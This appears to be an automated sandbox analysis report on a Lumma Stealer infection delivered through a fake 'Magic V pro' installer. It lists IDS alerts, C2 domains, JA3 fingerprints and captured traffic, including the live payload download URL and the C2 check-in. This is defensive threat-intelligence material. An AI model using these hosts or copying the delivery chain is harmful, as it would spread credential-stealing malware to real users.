Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+00000170h]	18_2_00433FCC
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	18_2_0040A7A0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 104.21.44.37:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 104.21.44.37:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 104.21.44.37:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: willpowerwav.site
Source: Malware configuration extractor	URLs: uncertainyelemz.bet
Source: Malware configuration extractor	URLs: hobbyedsmoker.live
Source: Malware configuration extractor	URLs: presentymusse.world
Source: Malware configuration extractor	URLs: deaddereaste.today
Source: Malware configuration extractor	URLs: subawhipnator.life
Source: Malware configuration extractor	URLs: privileggoe.live
Source: Malware configuration extractor	URLs: boltetuurked.digital

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 164.132.58.105 164.132.58.105
Source: Joe Sandbox View	IP Address: 190.92.154.206 190.92.154.206
Source: Joe Sandbox View	IP Address: 104.17.112.233 104.17.112.233

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49699 -> 104.17.112.233:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 164.132.58.105:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.44.37:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.44.37:443

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.254
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.254
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.254
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.254
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.133
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.194.133
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.21.226
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.133
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.194.133
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.21.226
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.254
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 18_2_004215A0 recv,

18_2_004215A0

Source: global traffic	HTTP traffic detected: GET /y7yju2tp HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)rentry-auth: e9700e0e5dfc56e362dbe75fHost: tinyurl.com
Source: global traffic	HTTP traffic detected: GET /cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)rentry-auth: e9700e0e5dfc56e362dbe75fHost: rentry.org
Source: global traffic	HTTP traffic detected: GET /willrandom.zip HTTP/1.1Accept: /User-Agent: InnoDownloadPlugin/1.5Host: rea.grupolalegion.ecConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiJo8sBCIWgzQEI9s/OAQiA1s4BCNLgzgEIr+TOAQji5M4BCIvlzgE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiJo8sBCIWgzQEI9s/OAQiA1s4BCNLgzgEIr+TOAQji5M4BCIvlzgE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: tinyurl.com
Source: global traffic	DNS traffic detected: DNS query: rentry.org
Source: global traffic	DNS traffic detected: DNS query: rea.grupolalegion.ec
Source: global traffic	DNS traffic detected: DNS query: willpowerwav.site
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons.gvt2.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: willpowerwav.site

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Mar 2025 02:24:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nw%2BrrGexu21wrSjvOafKjW%2FM4UHgcWJvFw4O6fmZUkHfR%2FFXDPad%2FvXQyhSi5vSzv8%2B1Nptdni2BALZpNb0jJfLvjJ5%2BZeN6o1uDYrQNC088AwTLfa%2F%2FW%2Fht1VUumGzwxhBFaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cee0c3ab2545ef-DFW

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1339622331.000000007F520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1336232678.000000007F3D0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1462611982.000000007D840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1/innosetup/index.htm
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1352839840.000000000018F000.00000004.00000010.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1339202842.0000000003610000.00000004.00001000.00020000.00000000.sdmp, idp.dll.8.dr, idp.dll.6.dr	String found in binary or memory: http://bitbucket.org/mitrich_k/inno-download-plugin
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1339622331.000000007F520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1338285278.000000007F4C0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1462611982.000000007D840000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1472944582.000000007E170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://jrsoftware.github.io/issrc/ISHelper/isxfunc.xml
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1352839840.000000000018F000.00000004.00000010.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1339202842.0000000003610000.00000004.00001000.00020000.00000000.sdmp, idp.dll.8.dr, idp.dll.6.dr	String found in binary or memory: http://mitrichsoftware.wordpress.comB
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1547354462.0000000002462000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.coa7F
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: chromecache_130.22.dr	String found in binary or memory: http://www.broofa.com
Source: taskshostw.exe, 00000012.00000000.1498144148.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, taskshostw.exe, 00000012.00000003.1634530071.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.11.dr	String found in binary or memory: http://www.freepdfeditor.net
Source: taskshostw.exe, 00000012.00000000.1498144148.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, taskshostw.exe, 00000012.00000003.1634530071.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.11.dr	String found in binary or memory: http://www.freepdfeditor.netj
Source: taskshostw.exe, 00000012.00000000.1498144148.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, taskshostw.exe, 00000012.00000003.1634530071.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.11.dr	String found in binary or memory: http://www.freepdfeditor.netopenU
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1275847273.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1276579889.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000000.1277900136.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.7.dr	String found in binary or memory: http://www.innosetup.com/
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1358117029.000000000235C000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000007.00000003.1704366229.0000000002271000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.kymoto.org0
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1274455155.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1358117029.000000000235C000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1351245017.00000000023D9000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1280450486.00000000033F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.kymoto.orgAbout
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1351245017.00000000023BD000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1547354462.00000000023ED000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.kymoto.orgq
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1275847273.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1276579889.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000000.1277900136.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.7.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: chromecache_128.22.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_128.22.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_128.22.dr, chromecache_130.22.dr	String found in binary or memory: https://apis.google.com
Source: chromecache_128.22.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_128.22.dr	String found in binary or memory: https://content.googleapis.com
Source: chromecache_128.22.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: chromecache_130.22.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_130.22.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_130.22.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_130.22.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: chromecache_130.22.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_128.22.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_128.22.dr	String found in binary or memory: https://plus.googleapis.com
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1551506407.0000000000942000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1551506407.000000000097E000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1461493380.000000000098A000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1551506407.0000000000983000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000002.1701339323.000000000098C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1461493380.000000000098A000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1551506407.0000000000983000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000002.1701339323.000000000098C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/$TE
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1461493380.0000000000996000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1399164930.000000000097D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/willrandom.zip
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1551506407.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipG
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1399164930.000000000090A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipG/h
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1399164930.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipH
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1508560173.0000000003F50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipdom.
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1551506407.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipo
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1399164930.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.org/
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1399164930.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.org/.
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1551506407.0000000000977000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.org/cc3ba8b679c926fc9911aede9009e589cbd3667
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1399164930.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.org/cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1399164930.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.org/cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/rawLocationETagA
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1399164930.0000000000919000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1551506407.00000000008E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tinyurl.com/
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000002.1701339323.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tinyurl.com/l
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000002.1701339323.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tinyurl.com/x
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1399164930.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tinyurl.com/y7yju2tp
Source: chromecache_128.22.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: taskshostw.exe, 00000012.00000003.2396086907.000000000088F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-.5:oV
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chromecache_128.22.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_128.22.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_130.22.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_130.22.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_130.22.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49675
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 104.17.112.233:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.28.254:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.37:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.37:443 -> 192.168.2.5:49708 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 18_2_0043AF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

18_2_0043AF10

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 18_2_0043AF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

18_2_0043AF10

Protection of GUI

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 18_2_0041EDA0 CreateDesktopW,

18_2_0041EDA0

System Summary

Drops password protected ZIP file

Source: logs.8.dr

Zip Entry: encrypted

Contains functionality to call native functions

